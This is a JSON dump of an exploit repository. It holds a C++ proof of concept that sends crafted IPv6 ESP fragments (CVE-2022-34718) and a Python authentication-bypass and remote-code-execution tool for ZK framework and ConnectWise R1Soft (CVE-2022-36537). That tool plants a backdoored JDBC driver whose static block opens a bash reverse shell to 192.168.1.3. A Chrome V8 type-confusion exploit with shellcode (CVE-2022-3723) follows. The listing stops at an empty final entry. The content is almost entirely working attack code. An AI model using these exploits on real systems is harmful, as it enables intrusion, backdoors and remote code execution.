[
  {
    "path": "CVE-2022-34718/poc.cpp",
    "content": "////////////////////////////////////////////////\r\n// ScannerDemo.cpp文件\r\n\r\n#include \"../common/initsock.h\"\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#include \"ntddndis.h\"\r\n\r\n#include \"protoutils.h\"\r\n#include \"ProtoPacket.h\"\r\n#include <Stdint.h>\r\n#include \"Iphlpapi.h\"\r\n#pragma comment(lib, \"Iphlpapi.lib\")\r\n#pragma comment(lib, \"Bcrypt.lib\")\r\n\r\n#include \"../common/comm.h\"\r\n\r\n\r\nDWORD WINAPI SendThread(LPVOID lpParam);\r\nBOOL GetGlobalData();\r\n\r\nu_char\tg_ucLocalMac[6];\t\r\nDWORD\tg_dwGatewayIP;\t\t\r\nDWORD\tg_dwLocalIP;\t\t\r\nDWORD\tg_dwMask;\t\t\t\r\n\r\nCInitSock theSock;\r\nBCRYPT_ALG_HANDLE       m_hAesAlg;\r\nBCRYPT_KEY_HANDLE       m_hKey;\r\nPBYTE                   m_pbKeyObject;\r\nPBYTE                   m_pbIV;\r\n\r\n//Handle for Hash\r\nBCRYPT_HASH_HANDLE\t\tm_hHash;\r\nPBYTE\t\t\t\t\tm_pbHashObject;\r\nBCRYPT_ALG_HANDLE\t\tm_hHashAlg;\r\nBYTE rgbHash[0x14];\r\n\r\nUCHAR str_SHA1_key[] =\r\n\"\\xbc\\x3d\\x6e\\x74\\x2d\\xd2\\x13\\xbe\\x0b\\xa9\\x42\\xb7\\x33\\xa4\\x7a\\xf4\\x9b\\xa2\\xa8\\x90\";\r\nUINT32 spi = htonl(0x861b157c);\r\nvoid SHA1(PUCHAR str_data, DWORD len)\r\n{\r\n\t\r\n\tBCRYPT_KEY_HANDLE\thKey = NULL;\r\n\tDWORD cbHashObject, cbResult, temp = 0;\r\n\t\r\n\tDWORD cbData = 0;\r\n\tBCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);\r\n\t//  Determine the size of the Hash object\r\n\tBCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);\r\n\tm_pbHashObject = (PBYTE)malloc(cbHashObject);\r\n\t//  Create the Hash object\r\n\tBCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);\r\n\t// Hash the data\r\n\tBCryptHashData(m_hHash, (PBYTE)str_data, len, 0);\r\n\t// Finish the hash\r\n\tBCryptFinishHash(m_hHash, rgbHash, 0x14, 0);\r\n\treturn ;\r\n\r\n}\r\nBOOL GetGlobalData()\r\n{\r\n\tPIP_ADAPTER_INFO pAdapterInfo = NULL;\r\n\tULONG ulLen = 0;\r\n\r\n\t::GetAdaptersInfo(pAdapterInfo, &ulLen);\r\n\tpAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);\r\n\r\n\tif (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)\r\n\t{\r\n\t\tif (pAdapterInfo != NULL)\r\n\t\t{\r\n\t\t\tmemcpy(g_ucLocalMac, pAdapterInfo->Address, 6);\r\n\t\t\tg_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);\r\n\t\t\tg_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);\r\n\t\t\tg_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);\r\n\t\t}\r\n\t}\r\n\t::GlobalFree(pAdapterInfo);\r\n\treturn TRUE;\r\n}\r\nint main()\r\n{\r\n\tGetGlobalData();\r\n\tif (!ProtoStartService())\r\n\t{\r\n\t\tprintf(\" ProtoStartService() failed %d \\n\", ::GetLastError());\r\n\t\treturn -1;\r\n\t}\r\n\tHANDLE hControlDevice = ProtoOpenControlDevice();\r\n\tif (hControlDevice == INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tprintf(\" ProtoOpenControlDevice() failed() %d \\n\", ::GetLastError());\r\n\t\tProtoStopService();\r\n\t\treturn -1;\r\n\t}\r\n\tCPROTOAdapters adapters;\r\n\tif (!adapters.EnumAdapters(hControlDevice))\r\n\t{\r\n\t\tprintf(\" Enume adapter failed \\n\");\r\n\t\tProtoStopService();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tCAdapter adapter;\r\n\tif (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))\r\n\t{\r\n\t\tprintf(\" OpenAdapter failed \\n\");\r\n\t\tProtoStopService();\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tadapter.SetFilter(\t//  NDIS_PACKET_TYPE_PROMISCUOUS|\r\n\t\tNDIS_PACKET_TYPE_DIRECTED |\r\n\t\tNDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);\r\n\r\n\r\n\tUCHAR ipv6_ESP_Fragment_1[] =\r\n\t\t\t\"\\x00\\x0c\\x29\\x1c\\x11\\x93\\x00\\x0c\\x29\\x5c\\x9a\\x88\\x86\\xdd\\x60\\x00\"\r\n\t\t\t\"\\x00\\x00\\x00\\x38\\x32\\x40\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x81\\x85\"\r\n\t\t\t\"\\xb1\\x51\\x19\\x43\\x54\\x19\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xe5\"\r\n\t\t\t\"\\x70\\x83\\x16\\x6f\\xef\\x6b\"\r\n\t\t\t\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x00\\x00\\x00\\x21\"//SPI+Seq\r\n\t\t\t\"\\x2c\\x00\\x00\\x01\\x52\\x52\\x52\\x52\\x32\\x00\\x00\\x01\\x96\\x74\\xd9\\x9d\"\r\n\t\t\t\"\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\t\t\"\\x01\\x02\\x02\\x2c\"//ESP tail\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";//HMAC;\r\n\tUCHAR ipv6_ESP_Fragment_2[] =\r\n\t\t\t\"\\x00\\x0c\\x29\\x1c\\x11\\x93\\x00\\x0c\\x29\\x5c\\x9a\\x88\\x86\\xdd\\x60\\x00\"\r\n\t\t\t\"\\x00\\x00\\x00\\x38\\x32\\x40\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x81\\x85\"\r\n\t\t\t\"\\xb1\\x51\\x19\\x43\\x54\\x19\\xfe\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xe5\"\r\n\t\t\t\"\\x70\\x83\\x16\\x6f\\xef\\x6b\"\r\n\t\t\t\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x00\\x00\\x00\\x22\"//SPI+Seq\r\n\t\t\t\"\\x2c\\x00\\x00\\x18\\x52\\x52\\x52\\x52\\x32\\x00\\x00\\x00\\x96\\x74\\xd9\\x9d\"\r\n\t\t\t\"\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\t\t\"\\x01\\x02\\x02\\x2c\"//ESP tail\r\n\t\t\t\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";//HMAC;\r\n\r\n\t\t\t\r\n\tmemcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);\r\n\tSHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);\r\n\tmemcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);\r\n\r\n\tmemcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);\r\n\tSHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);\r\n\tmemcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);\r\n\r\n\tadapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);\r\n\t\r\n\tadapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);\r\n\r\n\tProtoStopService();\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n"
  },
  {
    "path": "CVE-2022-36537/Driver.java",
    "content": "package com.mysql.jdbc;\n\nimport java.sql.*;\nimport java.util.*;\nimport java.util.logging.Logger;\n\n/*\n    author: Bearcat of www.numencyber.com\n    desc  : Mysql jdbc backdoor driver\n*/\npublic class Driver implements java.sql.Driver {\n    static {\n        String winCmd = \"calc\";\n        String linuxCmd = \"bash -i >& /dev/tcp/192.168.1.3/2022 0>&1\";\n\n        String[] cmds = null;\n\n        if (System.getProperty(\"os.name\").toLowerCase().contains(\"win\")) {\n            cmds = new String[]{\"cmd.exe\", \"/c\", winCmd};\n        } else {\n            cmds = new String[]{\"/bin/bash\", \"-c\", linuxCmd};\n        }\n\n        try {\n            Runtime.getRuntime().exec(cmds);\n        } catch (Exception ignored) {\n            // do nothing...\n        }\n    }\n\n @Override\n    public Connection connect(String url, Properties info) throws SQLException {\n        return null;\n    }\n\n    @Override\n    public boolean acceptsURL(String url) throws SQLException {\n        return false;\n    }\n\n    @Override\n    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {\n        return new DriverPropertyInfo[0];\n    }\n\n    @Override\n    public int getMajorVersion() {\n        return 0;\n    }\n\n    @Override\n    public int getMinorVersion() {\n        return 0;\n    }\n\n    @Override\n    public boolean jdbcCompliant() {\n        return false;\n    }\n\n    @Override\n    public Logger getParentLogger() throws SQLFeatureNotSupportedException {\n        return null;\n    }\n}"
  },
  {
    "path": "CVE-2022-36537/cve-2022-36537.py",
    "content": "#!/usr/bin/env python3\n# coding: utf-8\n\"\"\"\n@File    : cve-2022-36537.py\n@Time    : 2022/11/11 23:34\n@Author  : Bearcat of www.numencyber.com\n@Version : 1.0\n@Desc    : ZK framework authentication bypass & connectWise r1Soft server backup manager remote code execution.\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\nimport warnings\nimport re\n\nimport zipfile\nimport shutil\n\nimport requests\nfrom requests_toolbelt import MultipartEncoder\nimport urllib3\n\nfrom selenium import webdriver\nfrom rich import print as rprint\n\nimport argparse\n\nurllib3.disable_warnings()\n\n# proxy = {\n#    \"http\": \"http://127.0.0.1:8080\"\n# }\n\nproxy = {}\n\n\n# https://chromedriver.storage.googleapis.com/index.html?path=107.0.5304.62/\ndef bypass_auth1(target):\n    warnings.warn(\"Discard. The bypass auch2 function is simpler to obtain dtid and cookies.\", DeprecationWarning)\n    rprint(\"[italic green][*] Bypass authentication.\")\n    try:\n        opt = webdriver.ChromeOptions()\n        opt.add_argument('--headless')\n        opt.add_argument('--ignore-certificate-errors')\n        driver = webdriver.Chrome(executable_path='./chromedriver', options=opt)\n        driver.get(target)\n        cookie_str = \"JSESSIONID=\" + driver.get_cookie(\"JSESSIONID\")['value']\n        dtid = driver.execute_script(\"\"\"\n            for (var dtid in zk.Desktop.all)\n            return dtid\n        \"\"\")\n        return dtid, cookie_str\n    except Exception as e:\n        rprint(\"[italic red][-] Bypass authentication failed. {0}\".format(e))\n        exit()\n\n\ndef bypass_auth2(target):\n    rprint(\"[italic green][*] Bypass authentication.\")\n    uri = \"{0}/login.zul\".format(target)\n    try:\n        result = requests.get(url=uri, timeout=3, verify=False, proxies=proxy)\n        cookie_str = result.headers['Set-Cookie'].split(\";\")[0]\n        r = u\"dt:'(.*?)',cu:\"\n        regex = re.compile(r)\n        dtid = regex.findall(result.text)[0]\n        return dtid, cookie_str\n    except Exception as e:\n        rprint(\"[italic red][-] Bypass authentication failed. {0}\".format(e))\n        exit()\n\n\ndef forward_request(target, next_uri, cookie_str, uuid, dtid):\n    uri = \"{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1\".format(target, uuid, dtid)\n    param = {\"nextURI\": (None, next_uri)}\n    headers = {\"Cookie\": cookie_str}\n    data = MultipartEncoder(param, boundary=\"----WebKitFormBoundaryCs6yB0zvpfSBbYEp\")\n    headers[\"Content-Type\"] = data.content_type\n    try:\n        result = requests.post(url=uri, headers=headers, data=data.to_string(), timeout=3, verify=False, proxies=proxy)\n        return result\n    except Exception as e:\n        rprint(\"[italic red][-] Forward request failed. {0}\".format(e))\n        exit()\n\n\ndef read_file(target, filename):\n    # get login_dtid\n    login_dtid, cookie_str = bypass_auth2(target)\n    rprint(\"[italic green][*] Start reading the file:\")\n    result = forward_request(target, filename, cookie_str, \"101010\", login_dtid)\n    return \"-----file start-----\\n{0}\\n-----file end-----\".format(result.text)\n\n\ndef deploy_jdbc_backdoor(target):\n    rprint(\n        \"[italic red][!] The jdbc backdoor can only be deployed once, please make it persistent, such as rebounding the shell.\")\n    play_again = input(\"Whether to continue? (y/n):\").lower()\n    if play_again[0] != \"y\":\n        exit()\n    # get login_dtid\n    login_dtid, cookie_str = bypass_auth2(target)\n    rprint(\"[italic green][*] Start deploying the jdbc backdoor.\")\n    build_jdbc_backdoor()\n    # database_dtid and mysql_driver_upload_button_id\n    uri = \"/Configuration/database-drivers.zul\"\n    result = forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n    r1 = u\"{dt:'(.*?)',cu:\"\n    regex = re.compile(r1)\n    database_dtid = regex.findall(result.text)[0]\n    r1 = u\"'zul.wgt.Button','(.*?)',\"\n    regex = re.compile(r1)\n    mysql_driver_upload_button_id = regex.findall(result.text)[0]\n\n    uri = \"/zkau?dtid={0}&cmd_0=onClick&uuid_0={1}&data_0=%7B%22pageX%22%3A315%2C%22pageY%22%3A120%2C%22which%22%3A1%2C%22x%22%3A39%2C%22y%22%3A23%7D\".format(\n        database_dtid, mysql_driver_upload_button_id)\n    result = forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n\n    # file_upload_dlg_id and file_upload_id\n    r1 = u\"zul.fud.FileuploadDlg','(.*?)',\"\n    regex = re.compile(r1)\n    file_upload_dlg_id = regex.findall(result.text)[0]\n\n    r1 = u\"zul.wgt.Fileupload','(.*?)',\"\n    regex = re.compile(r1)\n    file_upload_id = regex.findall(result.text)[0]\n\n    uri = \"{0}/zkau/upload?uuid={1}&dtid={2}&sid=0&maxsize=-1\".format(target, file_upload_id, database_dtid)\n    upload_jdbc_backdoor(uri, cookie_str)\n\n    uri = \"/zkau?dtid={0}&cmd_0=onMove&opt_0=i&uuid_0={1}&data_0=%7B%22left%22%3A%22716px%22%2C%22top%22%3A%22100px%22%7D&cmd_1=onZIndex&opt_1=i&uuid_1={2}&data_1=%7B%22%22%3A1800%7D&cmd_2=updateResult&data_2=%7B%22contentId%22%3A%22z__ul_0%22%2C%22wid%22%3A%22{3}%22%2C%22sid%22%3A%220%22%7D\".format(\n        database_dtid, file_upload_dlg_id, file_upload_dlg_id, file_upload_id)\n    forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n\n    uri = \"/zkau?dtid={0}&cmd_0=onClose&uuid_0={1}&data_0=%7B%22%22%3Atrue%7D\".format(database_dtid,\n                                                                                      file_upload_dlg_id)\n    forward_request(target, uri, cookie_str, \"101010\", login_dtid)\n\n\ndef upload_jdbc_backdoor(uri, cookie_str):\n    rprint(\"[italic green][*] Upload the database driver.\")\n    headers = {\"Cookie\": cookie_str}\n    files = {'file': ('b.jar', open('jdbc_backdoor.jar', 'rb'), 'application/java-archive')}\n    try:\n        requests.post(uri, files=files, headers=headers, timeout=6, verify=False, proxies=proxy)\n    except Exception as e:\n        rprint(\"[italic red][-] Upload the database driver failed. {0}\".format(e))\n        exit()\n\n\ndef build_jdbc_backdoor():\n    rprint(\"[italic green][*] Compile java code.\")\n    java_cmd = 'javac -source 1.5 -target 1.5 Driver.java'\n    popen = subprocess.Popen(java_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n    popen.stdout.read()\n\n    tmp_path = 'jdbc_jar'\n    os.mkdir(tmp_path)\n    with zipfile.ZipFile('mysql-connector-java-5.1.48.jar', 'r', zipfile.ZIP_DEFLATED) as unzf:\n        unzf.extractall(\"jdbc_jar\")\n        unzf.close()\n    os.remove('jdbc_jar/com/mysql/jdbc/Driver.class')\n    shutil.copy('Driver.class', 'jdbc_jar/com/mysql/jdbc/')\n\n    with zipfile.ZipFile('jdbc_backdoor.jar', 'w', zipfile.ZIP_DEFLATED) as zf:\n        for root, dirs, files in os.walk(tmp_path):\n            relative_root = '' if root == tmp_path else root.replace(tmp_path, '') + os.sep\n            for filename in files:\n                zf.write(os.path.join(root, filename), relative_root + filename)\n        zf.close()\n    shutil.rmtree(tmp_path)\n\n    rprint(\"[italic green][*] Build jdbc backdoor success.\")\n\n\ndef banner():\n    rprint(\"[italic white]CVE-2022-36537:\\n\\tZK framework authentication bypass\")\n    rprint(\"[italic white]\\tConnectWise r1Soft server backup manager remote code execution\")\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser(prog='cve-2022-36537',\n                                     formatter_class=argparse.RawTextHelpFormatter,\n                                     description='author: Bearcat of www.numencyber.com',\n                                     usage='cve-2022-36537.py [options]')\n    parser.add_argument('-u', '--url', type=str, default='', help='target url')\n    parser.add_argument('-r', '--read', type=str, default='', help='reading the file')\n    parser.add_argument('-b', '--build', action=\"store_true\", help='build jdbc backdoor')\n    parser.add_argument('-d', '--deploy', action=\"store_true\", help='deploying the jdbc backdoor')\n\n    if len(sys.argv) == 1:\n        sys.argv.append('-h')\n\n    args = parser.parse_args()\n    return args\n\n\nif __name__ == '__main__':\n    banner()\n    args = parse_args()\n    if args.url and args.read:\n        print(read_file(args.url, args.read))\n        exit()\n    if args.build:\n        build_jdbc_backdoor()\n        exit()\n    if args.url and args.deploy:\n        deploy_jdbc_backdoor(args.url)\n        exit()\n"
  },
  {
    "path": "CVE-2022-36537/requirements.txt",
    "content": "requests==2.28.1\nrequests_toolbelt==0.10.1\nrich==12.6.0\nselenium==4.7.2\nurllib3==1.25.3\n"
  },
  {
    "path": "CVE-2022-3723/01.html",
    "content": "<body>\r\n    <div id=\"iframeContainer\"></div>\r\n</body>\r\n<script>\r\n    var arr = [2.2, 2.2];\r\n    window.onload = function () {\r\n        let frame = document.createElement(\"iframe\");\r\n        // 基本设置\r\n        frame.src = \"arr.html\"; // iframe 的来源\r\n        frame.height = \"300px\"; // iframe 的高度\r\n        frame.width = \"300px\"; // iframe 的宽度\r\n        // 将 iframe 插入到 HTML 文档中\r\n        let container = document.getElementById(\"iframeContainer\");\r\n        container.appendChild(frame);\r\n        alert(1);\r\n        % DebugPrint(arr);\r\n        alert(2); \r\n        let frame2 = document.createElement(\"iframe\");\r\n        // 基本设置\r\n        frame2.src = \"exp.html\"; // iframe 的来源\r\n        frame2.height = \"300px\"; // frame2 的高度\r\n        frame2.width = \"300px\"; // frame2 的宽度\r\n        // 将 frame2 插入到 HTML 文档中\r\n        container.appendChild(frame2);\r\n        alert(1);\r\n        % DebugPrint(arr);\r\n        alert(2);         \r\n    };\r\n</script>"
  },
  {
    "path": "CVE-2022-3723/Readme.md",
    "content": "exploit of CVE-2022-3723\n\nbased on google's public poc"
  },
  {
    "path": "CVE-2022-3723/arr.html",
    "content": "<script>\r\n    var dv = new DataView(new ArrayBuffer(0x10));\r\n    function gc() {\r\n        for (var i = 0; i < 0x100; i++) new Array(0x200);\r\n    }\r\n    const to_hex = num => {\r\n        return (num >> 0n).toString(16);\r\n    }\r\n    function biglow(b) {\r\n        dv.setBigUint64(0, b, true);\r\n        return (dv.getUint32(0, true));\r\n    }\r\n    function bighi(b) {\r\n        dv.setBigUint64(0, b, true);\r\n        return (dv.getUint32(4, true));\r\n    }\r\n    function f2big(f) {\r\n        dv.setFloat64(0, f, true);\r\n        return (dv.getBigUint64(0, true));\r\n    }\r\n    function big2f(b) {\r\n        dv.setBigUint64(0, b, true);\r\n        return dv.getFloat64(0, true);\r\n    }\r\n    function flow(f) {\r\n        dv.setFloat64(0, f, true);\r\n        return (dv.getUint32(0, true));\r\n    }\r\n    function fhi(f) {\r\n        dv.setFloat64(0, f, true);\r\n        return (dv.getUint32(4, true));\r\n    }\r\n    function i2f(low, hi) {\r\n        dv.setUint32(0, low, true);\r\n        dv.setUint32(4, hi, true);\r\n        return dv.getFloat64(0, true);\r\n    }\r\n    function majorGc() {\r\n        var arr_stack = [];\r\n        for (let i = 0; i < 80; i++) {\r\n            try {\r\n                arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));\r\n            } catch (msg) {\r\n                break;\r\n            }\r\n        }\r\n    }\r\n    class LeakArrayBuffer extends ArrayBuffer {\r\n        constructor(size) {\r\n            super(size);\r\n            this.rw = [1.7, 1.7];// 0x3ffb333333333333\r\n            this.slot = 0xb33f;//搜索0x1667E，查看改变位置，为leakObj地方\r\n        }\r\n    }\r\n    let shellcode = [2.222372952568011e+127,\r\n        3.4476922241098093e+40,\r\n        -2.5784757691472832e-254,\r\n        -1.476674265851898e-90,\r\n        2.582607795529539e-293,\r\n        2.4887534188622283e+253,\r\n        9.353354960368843e-158,\r\n        1.772861363575525e-297,\r\n        2.941218276584707e+26,\r\n        1.7578789445410664e-302,\r\n        -1.3535215646275278e-183,\r\n        1.19831254e-314];\r\n    var arr = null;\r\n    var buff = null;\r\n    for (let i = 0; i < 0x1000; i++) {\r\n        arr = new Array(1.1, 1.1);\r\n        buff = new LeakArrayBuffer(0x1337);\r\n    }\r\n    majorGc(); gc(); majorGc(); gc(); majorGc(); gc(); majorGc(); gc();\r\n    {\r\n        function leak() {\r\n            function setInnerProperty(o, obj) {\r\n                for (let m = 0; m < 0x100000; m++) {\r\n                    o.inner.foo = obj;\r\n                }\r\n            }\r\n            function foo(str, addr) {\r\n                var o = {\r\n                    inner: {\r\n                        ['foo']: 1.5\r\n                    }\r\n                };\r\n                eval(str);// eval防止内联\r\n                // o.inner.foo = addr;\r\n                return o.inner.foo;\r\n                // return arr;\r\n            };\r\n            % PrepareFunctionForOptimization(foo);\r\n            // optimize setInnerProperty\r\n            foo(\"setInnerProperty(o, arr);\", 1.4);\r\n            majorGc();\r\n            foo(\"setInnerProperty(o, arr);\", 1.4);\r\n            majorGc();\r\n            % OptimizeFunctionOnNextCall(foo);\r\n            let o = foo(\"setInnerProperty(o, arr);\", 1.4);\r\n            // console.log(f2big(o).toString(16));\r\n            return (f2big(o).toString(16));\r\n        }\r\n        let addr = leak();\r\n        fetch(addr, {\r\n            method: 'GET',\r\n            mode: 'no-cors' // 在开发环境中允许不安全连接\r\n        })\r\n            .then(response => {\r\n                % DebugPrint(\"fuckhere\");\r\n                % DebugPrint(arr);\r\n            })  // 你也可以使用 response.json() 如果你知道响应会是 JSON 格式的\r\n            .then(data => {\r\n                new Promise((resolve, reject) => {\r\n                    setTimeout(() => {\r\n                        resolve();\r\n                    }, 2000);\r\n                }).then(() => {\r\n                    if (arr.length !== 2) {\r\n                        alert(\"length is changed!!check how to exp\");\r\n                        console.log(\"length is changed!!check how to exp\");\r\n                        function leakObj(o) {\r\n                            buff.slot = o;\r\n                            return fhi(arr[10]);\r\n                        }\r\n                        function write(addr_low, val) {\r\n                            arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));\r\n                            buff.rw[0] = val;\r\n                        }\r\n                        function read(addr_low) {\r\n                            arr[15] = i2f((addr_low | 1) - 0x8, fhi(arr[15]));\r\n                            return buff.rw[0];\r\n                        }\r\n\r\n                        // randPE_addr = read(function_slot);\r\n                        // alert(f2big(randPE_addr).toString(16).padStart(16, 0));\r\n                        arr_addr = leakObj(shellcode);\r\n                        raw_shellcode_addr = ((flow(read(arr_addr + 0x8))) | 1) - 1 + 0x8;\r\n                        % DebugPrint(shellcode);\r\n                        alert(\"raw_shellcode_addr:\" + raw_shellcode_addr.toString(16).padStart(8, 0));\r\n                        fetch(raw_shellcode_addr.toString(16).padStart(8, 0)+\".wasm\")\r\n                            .then((response) => response.arrayBuffer())\r\n                            .then((wasmBinary) => WebAssembly.compile(wasmBinary))\r\n                            .then((wasmModule) => WebAssembly.instantiate(wasmModule))\r\n                            .then((wasmInstance) => {\r\n                                const { f } = wasmInstance.exports;\r\n                                % DebugPrint(\"wasmInstance addr is:\");\r\n                                % DebugPrint(wasmInstance);\r\n                                wasmInstance_addr = leakObj(wasmInstance);\r\n                                alert(\"wasmInstance_addr:\"+wasmInstance_addr.toString(16).padStart(8,0));\r\n                                rx_mem_addr = f2big(read(wasmInstance_addr + 0x60));\r\n                                alert(\"rx_mem_addr:\"+rx_mem_addr.toString(16).padStart(16,0));\r\n                                rop_start=rx_mem_addr+0x65dn;\r\n                                // 泄露function地址，修改 backingStore\r\n                                % DebugPrint(\"main func addr is:\");\r\n                                % DebugPrint(f);\r\n                                faddr = leakObj(f);\r\n                                alert(\"f addr:\" + faddr.toString(16).padStart(8, 0));\r\n                                function_slot = flow(read(faddr + 0x18)) + 0x10;\r\n                                alert(\"function_slot and go to mem to check addr:\" + function_slot.toString(16).padStart(8, 0));\r\n                                write(function_slot,big2f(rop_start));\r\n                                alert(\"check memory\");\r\n                                f();\r\n                            });\r\n                    }\r\n                });\r\n            })\r\n            .catch(error => {\r\n                // 在这里处理任何上面的.then()中发生的错误\r\n                console.error('Error:', error);\r\n            });\r\n    }\r\n</script>"
  },
  {
    "path": "CVE-2022-3723/exp.html",
    "content": "<script>\r\n    var arr = [2.2, 2.2];\r\n    function exp() {\r\n        var dv = new DataView(new ArrayBuffer(0x10));\r\n        function gc() {\r\n            for (var i = 0; i < 0x100; i++) new Array(0x200);\r\n        }\r\n        const to_hex = num => {\r\n            return (num >> 0n).toString(16);\r\n        }\r\n        function biglow(b) {\r\n            dv.setBigUint64(0, b);\r\n            return (dv.getUint32(0, true));\r\n        }\r\n        function bighi(b) {\r\n            dv.setBigUint64(0, b);\r\n            return (dv.getUint32(4, true));\r\n        }\r\n        function f2big(f) {\r\n            dv.setFloat64(0, f);\r\n            return (dv.getBigUint64(0, true));\r\n        }\r\n        function big2f(b) {\r\n            dv.setBigUint64(0, b, true);\r\n            return dv.getFloat64(0);\r\n        }\r\n        function flow(f) {\r\n            dv.setFloat64(0, f, true);\r\n            return (dv.getUint32(0, true));\r\n        }\r\n        function fhi(f) {\r\n            dv.setFloat64(0, f, true);\r\n            return (dv.getUint32(4, true));\r\n        }\r\n        function i2f(low, hi) {\r\n            dv.setUint32(0, low, true);\r\n            dv.setUint32(4, hi, true);\r\n            return dv.getFloat64(0, true);\r\n        }\r\n        function majorGc() {\r\n            var arr_stack = [];\r\n            for (let i = 0; i < 80; i++) {\r\n                try {\r\n                    arr_stack.push(new ArrayBuffer(0x7ff00000000 + i));\r\n                } catch (msg) {\r\n                    break;\r\n                }\r\n            }\r\n        }\r\n        function main() {\r\n            var arr = [1.1, 1.1];\r\n            function setInnerProperty(o, obj) {\r\n                for (let m = 0; m < 0x100000; m++) {\r\n                    o.inner.foo = obj;\r\n                }\r\n            }\r\n            // % PrepareFunctionForOptimization(setInnerProperty);\r\n            // % OptimizeFunctionOnNextCall(setInnerProperty);\r\n            function setaddr(str, addr, flag) {\r\n                var o = {\r\n                    inner: {\r\n                        ['foo']: 1.5\r\n                    }\r\n                };\r\n                eval(str);// eval防止内联\r\n                if (flag) {\r\n                    console.log(\"fuckme\");\r\n                    console.log(o.inner.foo)\r\n                }\r\n                o.inner.foo = addr;\r\n                // return o.inner.foo;\r\n                return arr;\r\n            };  \r\n            % PrepareFunctionForOptimization(setaddr);\r\n            // optimize setInnerProperty\r\n            setaddr(\"setInnerProperty(o, arr,false);\", xxx);\r\n            majorGc();\r\n            setaddr(\"setInnerProperty(o, arr,false);\", xxx);\r\n            majorGc();\r\n            % OptimizeFunctionOnNextCall(setaddr);\r\n            // % DebugPrint(arr);\r\n            // \r\n            let o = setaddr(\"setInnerProperty(o, arr,true);\", xxx);\r\n            %DebugPrint(\"fuck\");\r\n            % DebugPrint(o);\r\n            alert(\"go to change length\");\r\n            o[0]=i2f(flow(o[0]),0x40);\r\n            alert(\"check Length\");\r\n        }\r\n        main();\r\n    };\r\n    exp();\r\n</script>"
  },
  {
    "path": "CVE-2022-3723/go.mod",
    "content": "module httpsServer\n\ngo 1.20\n\nrequire github.com/bytecodealliance/wasmtime-go/v8 v8.0.0\n"
  },
  {
    "path": "CVE-2022-3723/go.sum",
    "content": "github.com/bytecodealliance/wasmtime-go/v8 v8.0.0 h1:jP4sqm2PHgm3+eQ50zCoCdIyQFkIL/Rtkw6TT8OYPFI=\ngithub.com/bytecodealliance/wasmtime-go/v8 v8.0.0/go.mod h1:tgazNLU7xSC2gfRAM8L4WyE+dgs5yp9FF5/tGebEQyM=\ngithub.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=\ngithub.com/niemeyer/pretty v0.0.0-20200227124842-a10e7caefd8e h1:fD57ERR4JtEqsWbfPhv4DMiApHyliiK5xCTNVSPiaAs=\ngithub.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=\ngithub.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk=\ngopkg.in/check.v1 v1.0.0-20200902074654-038fdea0a05b h1:QRR6H1YWRnHb4Y/HeNFCTJLFVxaq6wH4YuVdsUOr75U=\ngopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=\n"
  },
  {
    "path": "CVE-2022-3723/mainHttps.go",
